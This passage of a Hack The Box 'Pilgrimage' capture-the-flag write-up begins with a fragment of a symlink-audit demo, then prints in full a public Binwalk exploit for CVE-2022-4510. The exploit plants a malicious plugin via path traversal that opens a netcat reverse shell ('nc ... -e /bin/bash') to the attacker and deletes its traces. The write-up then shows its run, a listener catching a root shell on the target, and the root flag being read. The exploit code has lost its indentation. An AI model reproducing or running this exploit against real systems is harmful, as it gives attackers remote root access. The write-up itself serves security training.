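        out_dir = os.path.join(tmp, "a", "b", "c", "_sample.extracted")
        os.makedirs(out_dir)
        os.symlink(tmp, os.path.join(out_dir, "link"))
        return (audit(out_dir, SAMPLE_NAMES, naive_target),
                audit(out_dir, SAMPLE_NAMES, safe_target))

if __name__ == "__main__":
    naive, safe = demo()
    for name in SAMPLE_NAMES:
        print("%-30s naive=%-8s safe=%s" % (name, naive[name], safe[name]))
```

Independently of the check, an extractor that handles untrusted uploads should not run as root; the script above does, which is what turns a misplaced file write into full compromise.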

Download the exploit script and take a look.

┌──(kali㉿kali)-[~/Tools/AutoEnum]
└─$ cat 51249.py
# Exploit Title: Binwalk v2.3.2 - Remote Command Execution (RCE)
# Exploit Author: Etienne Lacoche
# CVE-ID: CVE-2022-4510
import os
import inspect
import argparse

print("")
print("################################################")
print("------------------CVE-2022-4510----------------")
print("################################################")
print("--------Binwalk Remote Command Execution--------")
print("------Binwalk 2.1.2b through 2.3.2 included-----")
print("------------------------------------------------")
print("################################################")
print("----------Exploit by: Etienne Lacoche-----------")
print("---------Contact Twitter: @electr0sm0g----------")
print("------------------Discovered by:----------------")
print("---------Q. Kaiser, ONEKEY Research Lab---------")
print("---------Exploit tested on debian 11------------")
print("################################################")
print("")

parser = argparse.ArgumentParser()
parser.add_argument("file", help="Path to input .png file",default=1)
parser.add_argument("ip", help="Ip to nc listener",default=1)
parser.add_argument("port", help="Port to nc listener",default=1)

args = parser.parse_args()

if args.file and args.ip and args.port:
header_pfs = bytes.fromhex("5046532f302e390000000000000001002e2e2f2e2e2f2e2e2f2e636f6e6669672f62696e77616c6b2f706c7567696e732f62696e77616c6b2e70790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034120000a0000000c100002e")
lines = ['import binwalk.core.plugin\n','import os\n', 'import shutil\n','class MaliciousExtractor(binwalk.core.plugin.Plugin):\n',' def init(self):\n',' if not os.path.exists("/tmp/.binwalk"):\n',' os.system("nc ',str(args.ip)+' ',str(args.port)+' ','-e /bin/bash 2>/dev/null &")\n',' with open("/tmp/.binwalk", "w") as f:\n',' f.write("1")\n',' else:\n',' os.remove("/tmp/.binwalk")\n', ' os.remove(os.path.abspath(__file__))\n',' shutil.rmtree(os.path.join(os.path.dirname(os.path.abspath(__file__)), "__pycache__"))\n']

in_file = open(args.file, "rb")
data = in_file.read()
in_file.close()

with open("/tmp/plugin", "w") as f:
for line in lines:
f.write(line)

with open("/tmp/plugin", "rb") as f:
content = f.read()

os.system("rm /tmp/plugin")

with open("binwalk_exploit.png", "wb") as f:
f.write(data)
f.write(header_pfs)
f.write(content)

print("")
print("You can now rename and share binwalk_exploit and start your local netcat listener.")
print("")

We run it to embed the exploit PFS into an image.

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ python3 51249.py lena.png <HTB_VPN_IP> 443

################################################
------------------CVE-2022-4510----------------
################################################
--------Binwalk Remote Command Execution--------
------Binwalk 2.1.2b through 2.3.2 included-----
------------------------------------------------
################################################
----------Exploit by: Etienne Lacoche-----------
---------Contact Twitter: @electr0sm0g----------
------------------Discovered by:----------------
---------Q. Kaiser, ONEKEY Research Lab---------
---------Exploit tested on debian 11------------
################################################


You can now rename and share binwalk_exploit and start your local netcat listener.

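Then we transfer the file to the target. Uploading it directly into /var/www/pilgrimage.htb/shrunk/ may not make the script run, but copying it there does trigger it.

Start an nc listener locally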

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [<HTB_VPN_IP>] from (UNKNOWN) [10.10.11.219] 60606
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
ls -la
total 12
drwxr-xr-x 3 root root 4096 Jul 12 17:24 .
drwx------ 5 root root 4096 Jun 8 00:10 ..
drwxr-xr-x 3 root root 4096 Jul 12 17:24 _exp.png.extracted
pwd
/root/quarantine
cd ..
ls -la
total 40
drwx------ 5 root root 4096 Jun 8 00:10 .
drwxr-xr-x 18 root root 4096 Jun 8 00:10 ..
lrwxrwxrwx 1 root root 9 Feb 10 13:43 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 Apr 11 2021 .bashrc
drwxr-xr-x 3 root root 4096 Jun 8 00:10 .config
-rw-r--r-- 1 root root 93 Jun 7 20:11 .gitconfig
drwxr-xr-x 3 root root 4096 Jun 8 00:10 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
drwxr-xr-x 3 root root 4096 Jul 12 17:24 quarantine
-rwxr-xr-x 1 root root 352 Jun 1 19:13 reset.sh
-rw-r----- 1 root root 33 Jul 12 15:37 root.txt
cat root.txt

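Done. The root flag is in root's directory.

Summary

This box mainly tests information gathering from a git source code leak, finding and exploiting the vulnerability in the corresponding service, and, in the privilege escalation part, analysing suspicious files and building an escalation approach. All in all, you need to keep levelling up your knowledge to handle it comfortably.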